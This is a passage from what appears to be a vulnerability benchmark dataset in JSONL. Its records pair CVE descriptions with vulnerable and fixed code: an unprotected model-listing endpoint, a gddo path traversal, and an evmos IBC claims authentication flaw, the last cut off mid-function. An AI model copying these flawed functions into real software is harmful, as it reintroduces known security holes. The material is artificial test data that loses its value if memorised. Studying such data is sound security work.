{\n try {\n if (response.locals.multiUserMode) {\n response.status(200).json({\n success: false,\n error: \"Multi-user mode is already enabled.\",\n });\n return;\n }\n\n const { username, password } = reqBody(request);\n const { user, error } = await User.create({\n username,\n password,\n role: ROLES.admin,\n });\n\n if (error || !user) {\n response.status(400).json({\n success: false,\n error: error || \"Failed to enable multi-user mode.\",\n });\n return;\n }\n\n await SystemSettings._updateSettings({\n multi_user_mode: true,\n });\n await BrowserExtensionApiKey.migrateApiKeysToMultiUser(user.id);\n\n await updateENV(\n {\n JWTSecret: process.env.JWT_SECRET || v4(),\n },\n true\n );\n await Telemetry.sendTelemetry(\"enabled_multi_user_mode\", {\n multiUserMode: true,\n });\n await EventLogs.logEvent(\"multi_user_mode_enabled\", {}, user?.id);\n response.status(200).json({ success: !!user, error });\n } catch (e) {\n await User.delete({});\n await SystemSettings._updateSettings({\n multi_user_mode: false,\n });\n\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.get(\"/system/multi-user-mode\", async (_, response) => {\n try {\n const multiUserMode = await SystemSettings.isMultiUserMode();\n response.status(200).json({ multiUserMode });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n });\n\n app.get(\"/system/logo\", async function (request, response) {\n try {\n const darkMode =\n !request?.query?.theme || request?.query?.theme === \"default\";\n const defaultFilename = getDefaultFilename(darkMode);\n const logoPath = await determineLogoFilepath(defaultFilename);\n const { found, buffer, size, mime } = fetchLogo(logoPath);\n\n if (!found) {\n response.sendStatus(204).end();\n return;\n }\n\n const currentLogoFilename = await SystemSettings.currentLogoFilename();\n response.writeHead(200, {\n \"Access-Control-Expose-Headers\":\n \"Content-Disposition,X-Is-Custom-Logo,Content-Type,Content-Length\",\n \"Content-Type\": mime || \"image/png\",\n \"Content-Disposition\": `attachment; filename=${path.basename(\n logoPath\n )}`,\n \"Content-Length\": size,\n \"X-Is-Custom-Logo\":\n currentLogoFilename !== null &&\n currentLogoFilename !== defaultFilename &&\n !isDefaultFilename(currentLogoFilename),\n });\n response.end(Buffer.from(buffer, \"base64\"));\n return;\n } catch (error) {\n console.error(\"Error processing the logo request:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n });\n\n app.get(\"/system/footer-data\", [validatedRequest], async (_, response) => {\n try {\n const footerData =\n (await SystemSettings.get({ label: \"footer_data\" }))?.value ??\n JSON.stringify([]);\n response.status(200).json({ footerData: footerData });\n } catch (error) {\n console.error(\"Error fetching footer data:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n });\n\n app.get(\"/system/support-email\", [validatedRequest], async (_, response) => {\n try {\n const supportEmail =\n (\n await SystemSettings.get({\n label: \"support_email\",\n })\n )?.value ?? null;\n response.status(200).json({ supportEmail: supportEmail });\n } catch (error) {\n console.error(\"Error fetching support email:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n });\n\n // No middleware protection in order to get this on the login page\n app.get(\"/system/custom-app-name\", async (_, response) => {\n try {\n const customAppName =\n (\n await SystemSettings.get({\n label: \"custom_app_name\",\n })\n )?.value ?? null;\n response.status(200).json({ customAppName: customAppName });\n } catch (error) {\n console.error(\"Error fetching custom app name:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n });\n\n app.get(\n \"/system/pfp/:id\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async function (request, response) {\n try {\n const { id } = request.params;\n if (response.locals?.user?.id !== Number(id))\n return response.sendStatus(204).end();\n\n const pfpPath = await determinePfpFilepath(id);\n if (!pfpPath) return response.sendStatus(204).end();\n\n const { found, buffer, size, mime } = fetchPfp(pfpPath);\n if (!found) return response.sendStatus(204).end();\n\n response.writeHead(200, {\n \"Content-Type\": mime || \"image/png\",\n \"Content-Disposition\": `attachment; filename=${path.basename(pfpPath)}`,\n \"Content-Length\": size,\n });\n response.end(Buffer.from(buffer, \"base64\"));\n return;\n } catch (error) {\n console.error(\"Error processing the logo request:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n }\n );\n\n app.post(\n \"/system/upload-pfp\",\n [validatedRequest, flexUserRoleValid([ROLES.all]), handlePfpUpload],\n async function (request, response) {\n try {\n const user = await userFromSession(request, response);\n const uploadedFileName = request.randomFileName;\n if (!uploadedFileName) {\n return response.status(400).json({ message: \"File upload failed.\" });\n }\n\n const userRecord = await User.get({ id: user.id });\n const oldPfpFilename = userRecord.pfpFilename;\n if (oldPfpFilename) {\n const storagePath = path.join(__dirname, \"../storage/assets/pfp\");\n const oldPfpPath = path.join(\n storagePath,\n normalizePath(userRecord.pfpFilename)\n );\n if (!isWithin(path.resolve(storagePath), path.resolve(oldPfpPath)))\n throw new Error(\"Invalid path name\");\n if (fs.existsSync(oldPfpPath)) fs.unlinkSync(oldPfpPath);\n }\n\n const { success, error } = await User.update(user.id, {\n pfpFilename: uploadedFileName,\n });\n\n return response.status(success ? 200 : 500).json({\n message: success\n ? \"Profile picture uploaded successfully.\"\n : error || \"Failed to update with new profile picture.\",\n });\n } catch (error) {\n console.error(\"Error processing the profile picture upload:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n }\n );\n\n app.delete(\n \"/system/remove-pfp\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async function (request, response) {\n try {\n const user = await userFromSession(request, response);\n const userRecord = await User.get({ id: user.id });\n const oldPfpFilename = userRecord.pfpFilename;\n\n if (oldPfpFilename) {\n const storagePath = path.join(__dirname, \"../storage/assets/pfp\");\n const oldPfpPath = path.join(\n storagePath,\n normalizePath(oldPfpFilename)\n );\n if (!isWithin(path.resolve(storagePath), path.resolve(oldPfpPath)))\n throw new Error(\"Invalid path name\");\n if (fs.existsSync(oldPfpPath)) fs.unlinkSync(oldPfpPath);\n }\n\n const { success, error } = await User.update(user.id, {\n pfpFilename: null,\n });\n\n return response.status(success ? 200 : 500).json({\n message: success\n ? \"Profile picture removed successfully.\"\n : error || \"Failed to remove profile picture.\",\n });\n } catch (error) {\n console.error(\"Error processing the profile picture removal:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n }\n );\n\n app.post(\n \"/system/upload-logo\",\n [\n validatedRequest,\n flexUserRoleValid([ROLES.admin, ROLES.manager]),\n handleAssetUpload,\n ],\n async (request, response) => {\n if (!request?.file || !request?.file.originalname) {\n return response.status(400).json({ message: \"No logo file provided.\" });\n }\n\n if (!validFilename(request.file.originalname)) {\n return response.status(400).json({\n message: \"Invalid file name. Please choose a different file.\",\n });\n }\n\n try {\n const newFilename = await renameLogoFile(request.file.originalname);\n const existingLogoFilename = await SystemSettings.currentLogoFilename();\n await removeCustomLogo(existingLogoFilename);\n\n const { success, error } = await SystemSettings._updateSettings({\n logo_filename: newFilename,\n });\n\n return response.status(success ? 200 : 500).json({\n message: success\n ? \"Logo uploaded successfully.\"\n : error || \"Failed to update with new logo.\",\n });\n } catch (error) {\n console.error(\"Error processing the logo upload:\", error);\n response.status(500).json({ message: \"Error uploading the logo.\" });\n }\n }\n );\n\n app.get(\"/system/is-default-logo\", async (_, response) => {\n try {\n const currentLogoFilename = await SystemSettings.currentLogoFilename();\n const isDefaultLogo = currentLogoFilename === LOGO_FILENAME;\n response.status(200).json({ isDefaultLogo });\n } catch (error) {\n console.error(\"Error processing the logo request:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n });\n\n app.get(\n \"/system/remove-logo\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (_request, response) => {\n try {\n const currentLogoFilename = await SystemSettings.currentLogoFilename();\n await removeCustomLogo(currentLogoFilename);\n const { success, error } = await SystemSettings._updateSettings({\n logo_filename: LOGO_FILENAME,\n });\n\n return response.status(success ? 200 : 500).json({\n message: success\n ? \"Logo removed successfully.\"\n : error || \"Failed to update with new logo.\",\n });\n } catch (error) {\n console.error(\"Error processing the logo removal:\", error);\n response.status(500).json({ message: \"Error removing the logo.\" });\n }\n }\n );\n\n app.get(\n \"/system/welcome-messages\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async function (_, response) {\n try {\n const welcomeMessages = await WelcomeMessages.getMessages();\n response.status(200).json({ success: true, welcomeMessages });\n } catch (error) {\n console.error(\"Error fetching welcome messages:\", error);\n response\n .status(500)\n .json({ success: false, message: \"Internal server error\" });\n }\n }\n );\n\n app.post(\n \"/system/set-welcome-messages\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (request, response) => {\n try {\n const { messages = [] } = reqBody(request);\n if (!Array.isArray(messages)) {\n return response.status(400).json({\n success: false,\n message: \"Invalid message format. Expected an array of messages.\",\n });\n }\n\n await WelcomeMessages.saveAll(messages);\n return response.status(200).json({\n success: true,\n message: \"Welcome messages saved successfully.\",\n });\n } catch (error) {\n console.error(\"Error processing the welcome messages:\", error);\n response.status(500).json({\n success: true,\n message: \"Error saving the welcome messages.\",\n });\n }\n }\n );\n\n app.get(\"/system/api-keys\", [validatedRequest], async (_, response) => {\n try {\n if (response.locals.multiUserMode) {\n return response.sendStatus(401).end();\n }\n\n const apiKeys = await ApiKey.where({});\n return response.status(200).json({\n apiKeys,\n error: null,\n });\n } catch (error) {\n console.error(error);\n response.status(500).json({\n apiKey: null,\n error: \"Could not find an API Key.\",\n });\n }\n });\n\n app.post(\n \"/system/generate-api-key\",\n [validatedRequest],\n async (_, response) => {\n try {\n if (response.locals.multiUserMode) {\n return response.sendStatus(401).end();\n }\n\n const { apiKey, error } = await ApiKey.create();\n await Telemetry.sendTelemetry(\"api_key_created\");\n await EventLogs.logEvent(\n \"api_key_created\",\n {},\n response?.locals?.user?.id\n );\n return response.status(200).json({\n apiKey,\n error,\n });\n } catch (error) {\n console.error(error);\n response.status(500).json({\n apiKey: null,\n error: \"Error generating api key.\",\n });\n }\n }\n );\n\n app.delete(\"/system/api-key\", [validatedRequest], async (_, response) => {\n try {\n if (response.locals.multiUserMode) {\n return response.sendStatus(401).end();\n }\n\n await ApiKey.delete();\n await EventLogs.logEvent(\n \"api_key_deleted\",\n { deletedBy: response.locals?.user?.username },\n response?.locals?.user?.id\n );\n return response.status(200).end();\n } catch (error) {\n console.error(error);\n response.status(500).end();\n }\n });\n\n app.post(\n \"/system/custom-models\",\n [validatedRequest, flexUserRoleValid([ROLES.admin])],\n async (request, response) => {\n try {\n const { provider, apiKey = null, basePath = null } = reqBody(request);\n const { models, error } = await getCustomModels(\n provider,\n apiKey,\n basePath\n );\n return response.status(200).json({\n models,\n error,\n });\n } catch (error) {\n console.error(error);\n response.status(500).end();\n }\n }\n );\n\n app.post(\n \"/system/event-logs\",\n [validatedRequest, flexUserRoleValid([ROLES.admin])],\n async (request, response) => {\n try {\n const { offset = 0, limit = 10 } = reqBody(request);\n const logs = await EventLogs.whereWithData({}, limit, offset * limit, {\n id: \"desc\",\n });\n const totalLogs = await EventLogs.count();\n const hasPages = totalLogs > (offset + 1) * limit;\n\n response.status(200).json({ logs: logs, hasPages, totalLogs });\n } catch (e) {\n console.error(e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.delete(\n \"/system/event-logs\",\n [validatedRequest, flexUserRoleValid([ROLES.admin])],\n async (_, response) => {\n try {\n await EventLogs.delete();\n await EventLogs.logEvent(\n \"event_logs_cleared\",\n {},\n response?.locals?.user?.id\n );\n response.json({ success: true });\n } catch (e) {\n console.error(e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.post(\n \"/system/workspace-chats\",\n [\n chatHistoryViewable,\n validatedRequest,\n flexUserRoleValid([ROLES.admin, ROLES.manager]),\n ],\n async (request, response) => {\n try {\n const { offset = 0, limit = 20 } = reqBody(request);\n const chats = await WorkspaceChats.whereWithData(\n {},\n limit,\n offset * limit,\n { id: \"desc\" }\n );\n const totalChats = await WorkspaceChats.count();\n const hasPages = totalChats > (offset + 1) * limit;\n\n response.status(200).json({ chats: chats, hasPages, totalChats });\n } catch (e) {\n console.error(e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.delete(\n \"/system/workspace-chats/:id\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (request, response) => {\n try {\n const { id } = request.params;\n Number(id) === -1\n ? await WorkspaceChats.delete({}, true)\n : await WorkspaceChats.delete({ id: Number(id) });\n response.json({ success: true, error: null });\n } catch (e) {\n console.error(e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.get(\n \"/system/export-chats\",\n [\n chatHistoryViewable,\n validatedRequest,\n flexUserRoleValid([ROLES.manager, ROLES.admin]),\n ],\n async (request, response) => {\n try {\n const { type = \"jsonl\", chatType = \"workspace\" } = request.query;\n const { contentType, data } = await exportChatsAsType(type, chatType);\n await EventLogs.logEvent(\n \"exported_chats\",\n {\n type,\n chatType,\n },\n response.locals.user?.id\n );\n response.setHeader(\"Content-Type\", contentType);\n response.status(200).send(data);\n } catch (e) {\n console.error(e);\n response.sendStatus(500).end();\n }\n }\n );\n\n // Used for when a user in multi-user updates their own profile\n // from the UI.\n app.post(\"/system/user\", [validatedRequest], async (request, response) => {\n try {\n const sessionUser = await userFromSession(request, response);\n const { username, password } = reqBody(request);\n const id = Number(sessionUser.id);\n\n if (!id) {\n response.status(400).json({ success: false, error: \"Invalid user ID\" });\n return;\n }\n\n const updates = {};\n if (username) {\n updates.username = User.validations.username(String(username));\n }\n if (password) {\n updates.password = String(password);\n }\n\n if (Object.keys(updates).length === 0) {\n response\n .status(400)\n .json({ success: false, error: \"No updates provided\" });\n return;\n }\n\n const { success, error } = await User.update(id, updates);\n response.status(200).json({ success, error });\n } catch (e) {\n console.error(e);\n response.sendStatus(500).end();\n }\n });\n\n app.get(\n \"/system/slash-command-presets\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async (request, response) => {\n try {\n const user = await userFromSession(request, response);\n const userPresets = await SlashCommandPresets.getUserPresets(user?.id);\n response.status(200).json({ presets: userPresets });\n } catch (error) {\n console.error(\"Error fetching slash command presets:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n }\n );\n\n app.post(\n \"/system/slash-command-presets\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async (request, response) => {\n try {\n const user = await userFromSession(request, response);\n const { command, prompt, description } = reqBody(request);\n const presetData = {\n command: SlashCommandPresets.formatCommand(String(command)),\n prompt: String(prompt),\n description: String(description),\n };\n\n const preset = await SlashCommandPresets.create(user?.id, presetData);\n if (!preset) {\n return response\n .status(500)\n .json({ message: \"Failed to create preset\" });\n }\n response.status(201).json({ preset });\n } catch (error) {\n console.error(\"Error creating slash command preset:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n }\n );\n\n app.post(\n \"/system/slash-command-presets/:slashCommandId\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async (request, response) => {\n try {\n const user = await userFromSession(request, response);\n const { slashCommandId } = request.params;\n const { command, prompt, description } = reqBody(request);\n\n // Valid user running owns the preset if user session is valid.\n const ownsPreset = await SlashCommandPresets.get({\n userId: user?.id ?? null,\n id: Number(slashCommandId),\n });\n if (!ownsPreset)\n return response.status(404).json({ message: \"Preset not found\" });\n\n const updates = {\n command: SlashCommandPresets.formatCommand(String(command)),\n prompt: String(prompt),\n description: String(description),\n };\n\n const preset = await SlashCommandPresets.update(\n Number(slashCommandId),\n updates\n );\n if (!preset) return response.sendStatus(422);\n response.status(200).json({ preset: { ...ownsPreset, ...updates } });\n } catch (error) {\n console.error(\"Error updating slash command preset:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n }\n );\n\n app.delete(\n \"/system/slash-command-presets/:slashCommandId\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async (request, response) => {\n try {\n const { slashCommandId } = request.params;\n const user = await userFromSession(request, response);\n\n // Valid user running owns the preset if user session is valid.\n const ownsPreset = await SlashCommandPresets.get({\n userId: user?.id ?? null,\n id: Number(slashCommandId),\n });\n if (!ownsPreset)\n return response\n .status(403)\n .json({ message: \"Failed to delete preset\" });\n\n await SlashCommandPresets.delete(Number(slashCommandId));\n response.sendStatus(204);\n } catch (error) {\n console.error(\"Error deleting slash command preset:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n }\n );\n}"}], "vul_patch": "--- a/server/endpoints/system.js\n+++ b/server/endpoints/system.js\n@@ -887,7 +887,7 @@\n \n app.post(\n \"/system/custom-models\",\n- [validatedRequest],\n+ [validatedRequest, flexUserRoleValid([ROLES.admin])],\n async (request, response) => {\n try {\n const { provider, apiKey = null, basePath = null } = reqBody(request);\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-12976", "cve_description": "In Go Doc Dot Org (gddo) through 2018-06-27, an attacker could use specially crafted tags in packages being fetched by gddo to cause a directory traversal and remote code execution.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/golang/gddo", "patch_url": ["https://github.com/golang/gddo/commit/daffe1f90ec57f8ed69464f9094753fc6452e983"], "programing_language": "Go", "vul_func": [{"id": "vul_go_19_1", "commit": "9ab275b", "file_path": "gosrc/gosrc.go", "start_line": 353, "end_line": 446, "snippet": "func getDynamic(ctx context.Context, client *http.Client, importPath, etag string) (*Directory, error) {\n\tmetaProto, im, sm, redir, err := fetchMeta(ctx, client, importPath)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif im.projectRoot != importPath {\n\t\tvar imRoot *importMeta\n\t\tmetaProto, imRoot, _, redir, err = fetchMeta(ctx, client, im.projectRoot)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif *imRoot != *im {\n\t\t\treturn nil, NotFoundError{Message: \"project root mismatch.\"}\n\t\t}\n\t}\n\n\t// clonePath is the repo URL from import meta tag, with the \"scheme://\" prefix removed.\n\t// It should be used for cloning repositories.\n\t// repo is the repo URL from import meta tag, with the \"scheme://\" prefix removed, and\n\t// a possible \".vcs\" suffix trimmed.\n\ti := strings.Index(im.repo, \"://\")\n\tif i < 0 {\n\t\treturn nil, NotFoundError{Message: \"bad repo URL: \" + im.repo}\n\t}\n\tproto := im.repo[:i]\n\tclonePath := im.repo[i+len(\"://\"):]\n\trepo := strings.TrimSuffix(clonePath, \".\"+im.vcs)\n\tdirName := importPath[len(im.projectRoot):]\n\n\tresolvedPath := repo + dirName\n\tdir, err := getStatic(ctx, client, resolvedPath, etag)\n\tif err == errNoMatch {\n\t\tresolvedPath = repo + \".\" + im.vcs + dirName\n\t\tmatch := map[string]string{\n\t\t\t\"dir\": dirName,\n\t\t\t\"importPath\": importPath,\n\t\t\t\"clonePath\": clonePath,\n\t\t\t\"repo\": repo,\n\t\t\t\"scheme\": proto,\n\t\t\t\"vcs\": im.vcs,\n\t\t}\n\t\tdir, err = getVCSDirFn(ctx, client, match, etag)\n\t}\n\tif err != nil || dir == nil {\n\t\treturn nil, err\n\t}\n\n\tdir.ImportPath = importPath\n\tdir.ProjectRoot = im.projectRoot\n\tdir.ResolvedPath = resolvedPath\n\tdir.ProjectName = path.Base(im.projectRoot)\n\tif !redir {\n\t\tdir.ProjectURL = metaProto + \"://\" + im.projectRoot\n\t}\n\n\tif sm == nil {\n\t\treturn dir, nil\n\t}\n\n\tif isHTTPURL(sm.projectURL) {\n\t\tdir.ProjectURL = sm.projectURL\n\t}\n\n\tif isHTTPURL(sm.dirTemplate) {\n\t\tdir.BrowseURL = replaceDir(sm.dirTemplate, dirName)\n\t}\n\n\t// TODO: Refactor this to be simpler, implement the go-source meta tag spec fully.\n\tif isHTTPURL(sm.fileTemplate) {\n\t\tfileTemplate := replaceDir(sm.fileTemplate, dirName)\n\t\tif strings.Contains(fileTemplate, \"{file}\") {\n\t\t\tcut := strings.LastIndex(fileTemplate, \"{file}\") + len(\"{file}\") // Cut point is right after last {file} section.\n\t\t\tswitch hash := strings.Index(fileTemplate, \"#\"); {\n\t\t\tcase hash == -1: // If there's no '#', place cut at the end.\n\t\t\t\tcut = len(fileTemplate)\n\t\t\tcase hash > cut: // If a '#' comes after last {file}, use it as cut point.\n\t\t\t\tcut = hash\n\t\t\t}\n\t\t\thead, tail := fileTemplate[:cut], fileTemplate[cut:]\n\t\t\tfor _, f := range dir.Files {\n\t\t\t\tf.BrowseURL = strings.Replace(head, \"{file}\", f.Name, -1)\n\t\t\t}\n\n\t\t\tif strings.Contains(tail, \"{line}\") {\n\t\t\t\ts := strings.Replace(tail, \"%\", \"%%\", -1)\n\t\t\t\ts = strings.Replace(s, \"{line}\", \"%d\", 1)\n\t\t\t\tdir.LineFmt = \"%s\" + s\n\t\t\t}\n\t\t}\n\t}\n\n\treturn dir, nil\n}"}], "fix_func": [{"id": "fix_go_19_1", "commit": "daffe1f", "file_path": "gosrc/gosrc.go", "start_line": 353, "end_line": 449, "snippet": "func getDynamic(ctx context.Context, client *http.Client, importPath, etag string) (*Directory, error) {\n\tmetaProto, im, sm, redir, err := fetchMeta(ctx, client, importPath)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif im.projectRoot != importPath {\n\t\tvar imRoot *importMeta\n\t\tmetaProto, imRoot, _, redir, err = fetchMeta(ctx, client, im.projectRoot)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif *imRoot != *im {\n\t\t\treturn nil, NotFoundError{Message: \"project root mismatch.\"}\n\t\t}\n\t}\n\n\t// clonePath is the repo URL from import meta tag, with the \"scheme://\" prefix removed.\n\t// It should be used for cloning repositories.\n\t// repo is the repo URL from import meta tag, with the \"scheme://\" prefix removed, and\n\t// a possible \".vcs\" suffix trimmed.\n\ti := strings.Index(im.repo, \"://\")\n\tif i < 0 {\n\t\treturn nil, NotFoundError{Message: \"bad repo URL: \" + im.repo}\n\t}\n\tproto := im.repo[:i]\n\tclonePath := im.repo[i+len(\"://\"):]\n\trepo := strings.TrimSuffix(clonePath, \".\"+im.vcs)\n\tif !IsValidRemotePath(repo) {\n\t\treturn nil, fmt.Errorf(\"bad path from meta: %s\", repo)\n\t}\n\tdirName := importPath[len(im.projectRoot):]\n\n\tresolvedPath := repo + dirName\n\tdir, err := getStatic(ctx, client, resolvedPath, etag)\n\tif err == errNoMatch {\n\t\tresolvedPath = repo + \".\" + im.vcs + dirName\n\t\tmatch := map[string]string{\n\t\t\t\"dir\": dirName,\n\t\t\t\"importPath\": importPath,\n\t\t\t\"clonePath\": clonePath,\n\t\t\t\"repo\": repo,\n\t\t\t\"scheme\": proto,\n\t\t\t\"vcs\": im.vcs,\n\t\t}\n\t\tdir, err = getVCSDirFn(ctx, client, match, etag)\n\t}\n\tif err != nil || dir == nil {\n\t\treturn nil, err\n\t}\n\n\tdir.ImportPath = importPath\n\tdir.ProjectRoot = im.projectRoot\n\tdir.ResolvedPath = resolvedPath\n\tdir.ProjectName = path.Base(im.projectRoot)\n\tif !redir {\n\t\tdir.ProjectURL = metaProto + \"://\" + im.projectRoot\n\t}\n\n\tif sm == nil {\n\t\treturn dir, nil\n\t}\n\n\tif isHTTPURL(sm.projectURL) {\n\t\tdir.ProjectURL = sm.projectURL\n\t}\n\n\tif isHTTPURL(sm.dirTemplate) {\n\t\tdir.BrowseURL = replaceDir(sm.dirTemplate, dirName)\n\t}\n\n\t// TODO: Refactor this to be simpler, implement the go-source meta tag spec fully.\n\tif isHTTPURL(sm.fileTemplate) {\n\t\tfileTemplate := replaceDir(sm.fileTemplate, dirName)\n\t\tif strings.Contains(fileTemplate, \"{file}\") {\n\t\t\tcut := strings.LastIndex(fileTemplate, \"{file}\") + len(\"{file}\") // Cut point is right after last {file} section.\n\t\t\tswitch hash := strings.Index(fileTemplate, \"#\"); {\n\t\t\tcase hash == -1: // If there's no '#', place cut at the end.\n\t\t\t\tcut = len(fileTemplate)\n\t\t\tcase hash > cut: // If a '#' comes after last {file}, use it as cut point.\n\t\t\t\tcut = hash\n\t\t\t}\n\t\t\thead, tail := fileTemplate[:cut], fileTemplate[cut:]\n\t\t\tfor _, f := range dir.Files {\n\t\t\t\tf.BrowseURL = strings.Replace(head, \"{file}\", f.Name, -1)\n\t\t\t}\n\n\t\t\tif strings.Contains(tail, \"{line}\") {\n\t\t\t\ts := strings.Replace(tail, \"%\", \"%%\", -1)\n\t\t\t\ts = strings.Replace(s, \"{line}\", \"%d\", 1)\n\t\t\t\tdir.LineFmt = \"%s\" + s\n\t\t\t}\n\t\t}\n\t}\n\n\treturn dir, nil\n}"}], "vul_patch": "--- a/gosrc/gosrc.go\n+++ b/gosrc/gosrc.go\n@@ -26,6 +26,9 @@\n \tproto := im.repo[:i]\n \tclonePath := im.repo[i+len(\"://\"):]\n \trepo := strings.TrimSuffix(clonePath, \".\"+im.vcs)\n+\tif !IsValidRemotePath(repo) {\n+\t\treturn nil, fmt.Errorf(\"bad path from meta: %s\", repo)\n+\t}\n \tdirName := importPath[len(im.projectRoot):]\n \n \tresolvedPath := repo + dirName\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2018-12976:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/gddo\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestGetDynamic$ github.com/golang/gddo/gosrc\n", "unit_test_cmd": null} {"cve_id": "CVE-2022-24738", "cve_description": "Evmos is the Ethereum Virtual Machine (EVM) Hub on the Cosmos Network. In versions of evmos prior to 2.0.1 attackers are able to drain unclaimed funds from user addresses. To do this an attacker must create a new chain which does not enforce signature verification and connects it to the target evmos instance. The attacker can use this joined chain to transfer unclaimed funds. Users are advised to upgrade. There are no known workarounds for this issue.", "cwe_info": {"CWE-287": {"name": "Improper Authentication", "description": "When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct."}}, "repo": "https://github.com/tharsis/evmos", "patch_url": ["https://github.com/tharsis/evmos/commit/28870258d4ee9f1b8aeef5eba891681f89348f71"], "programing_language": "Go", "vul_func": [{"id": "vul_go_69_2", "commit": "a5a1221", "file_path": "x/claims/keeper/ibc_callbacks.go", "start_line": 17, "end_line": 105, "snippet": "func (k Keeper) OnRecvPacket(\n\tctx sdk.Context,\n\tpacket channeltypes.Packet,\n\tack exported.Acknowledgement,\n) exported.Acknowledgement {\n\tparams := k.GetParams(ctx)\n\n\t// short circuit in case claim is not active (no-op)\n\tif !params.IsClaimsActive(ctx.BlockTime()) {\n\t\treturn ack\n\t}\n\n\t// unmarshal packet data to obtain the sender and recipient\n\tvar data transfertypes.FungibleTokenPacketData\n\tif err := transfertypes.ModuleCdc.UnmarshalJSON(packet.GetData(), &data); err != nil {\n\t\terr = sdkerrors.Wrapf(sdkerrors.ErrUnknownRequest, \"cannot unmarshal ICS-20 transfer packet data\")\n\t\treturn channeltypes.NewErrorAcknowledgement(err.Error())\n\t}\n\n\t// validate the sender bech32 address from the counterparty chain\n\tbech32Prefix := strings.Split(data.Sender, \"1\")[0]\n\tif bech32Prefix == data.Sender {\n\t\treturn channeltypes.NewErrorAcknowledgement(\n\t\t\tsdkerrors.Wrapf(sdkerrors.ErrInvalidAddress, \"invalid sender: %s\", data.Sender).Error(),\n\t\t)\n\t}\n\n\tsenderBz, err := sdk.GetFromBech32(data.Sender, bech32Prefix)\n\tif err != nil {\n\t\treturn channeltypes.NewErrorAcknowledgement(\n\t\t\tsdkerrors.Wrapf(sdkerrors.ErrInvalidAddress, \"invalid sender %s, %s\", data.Sender, err.Error()).Error(),\n\t\t)\n\t}\n\n\t// change the bech32 human readable prefix (HRP) of the sender to `evmos1`\n\tsender := sdk.AccAddress(senderBz)\n\n\t// obtain the evmos recipient address\n\trecipient, err := sdk.AccAddressFromBech32(data.Receiver)\n\tif err != nil {\n\t\treturn channeltypes.NewErrorAcknowledgement(\n\t\t\tsdkerrors.Wrapf(sdkerrors.ErrInvalidAddress, \"invalid receiver address %s\", err.Error()).Error(),\n\t\t)\n\t}\n\n\tsenderClaimsRecord, senderRecordFound := k.GetClaimsRecord(ctx, sender)\n\trecipientClaimsRecord, recipientRecordFound := k.GetClaimsRecord(ctx, recipient)\n\n\t// handle the 4 cases for the recipient and sender claim records\n\n\tswitch {\n\tcase senderRecordFound && recipientRecordFound:\n\t\t// 1. Both sender and recipient have a claims record\n\t\t// Merge sender's record with the recipient's record and\n\t\t// claim actions that have been completed by one or the other\n\t\trecipientClaimsRecord, err = k.MergeClaimsRecords(ctx, recipient, senderClaimsRecord, recipientClaimsRecord, params)\n\t\tif err != nil {\n\t\t\treturn channeltypes.NewErrorAcknowledgement(err.Error())\n\t\t}\n\n\t\t// update the recipient's record with the new merged one, while deleting the\n\t\t// sender's record\n\t\tk.SetClaimsRecord(ctx, recipient, recipientClaimsRecord)\n\t\tk.DeleteClaimsRecord(ctx, sender)\n\tcase senderRecordFound && !recipientRecordFound:\n\t\t// 2. Only the sender has a claims record.\n\t\t// Migrate the sender record to the recipient address\n\t\tk.SetClaimsRecord(ctx, recipient, senderClaimsRecord)\n\t\tk.DeleteClaimsRecord(ctx, sender)\n\n\t\t// claim IBC action\n\t\t_, err = k.ClaimCoinsForAction(ctx, recipient, senderClaimsRecord, types.ActionIBCTransfer, params)\n\tcase !senderRecordFound && recipientRecordFound:\n\t\t// 3. Only the recipient has a claims record.\n\t\t// Only claim IBC transfer action\n\t\t_, err = k.ClaimCoinsForAction(ctx, recipient, recipientClaimsRecord, types.ActionIBCTransfer, params)\n\tcase !senderRecordFound && !recipientRecordFound:\n\t\t// 4. Neither the sender or recipient have a claims record.\n\t\t// Perform a no-op by returning the original success acknowledgement\n\t\treturn ack\n\t}\n\n\tif err != nil {\n\t\treturn 